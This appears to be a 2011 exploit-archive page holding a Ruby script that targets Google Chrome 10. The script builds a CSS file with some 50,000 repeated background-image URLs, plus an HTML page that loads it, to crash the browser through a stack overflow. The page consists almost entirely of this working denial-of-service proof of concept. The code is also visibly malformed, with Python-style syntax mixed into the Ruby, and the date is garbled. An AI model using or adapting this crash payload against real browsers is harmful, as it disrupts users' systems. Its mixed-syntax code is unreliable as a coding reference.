Home / exploits Google Chrome 10.0.648.205 Stack Overflow
Posted on 19 April 2011
#!/usr/bin/ruby # #[+]Exploit Title: Google Chrome 10.0.648.205 Stack Overflow Vulnerability #[+]Date: 17�42011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.google.com/chrome #[+]Version: 10.0.648.205 #[+]Teste On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # # # #About: # #This is a bug of the Stack Overflow #that occurs when the safari or google chrome #deals with many URLs in the background-image #only causes a crash does not allow code execution. # # print """ Created By C4SS!0 G0M3S E-mail Louredo_@hotmail.com Site www.exploit-br.org """ css = """ body { background-image:""" i=0 while i<50000: css += "url('imagem.bmp')," i+=1 end css += "url('imagem.bmp'); } " print "[+]Creating File style.css... " sleep(1) begin f = File.open("style.css","wb") f.write css f.close rescue print "Error: #{$!} " exit end print "[+]File Style.css Created With Sucess " sleep(1) HTML = ''' <html> <head> <link rel="stylesheet" type="text/css" href="style.css"></link> </head> <body> </body> </html> ''' print "[+]Creating File Exploit.html... " sleep(1) begin f = File.open("Exploit.html","wb") f.write HTML f.close rescue print "Error: #{$!} " end print "[+]File Exploit.html Created With Success " sleep(1)
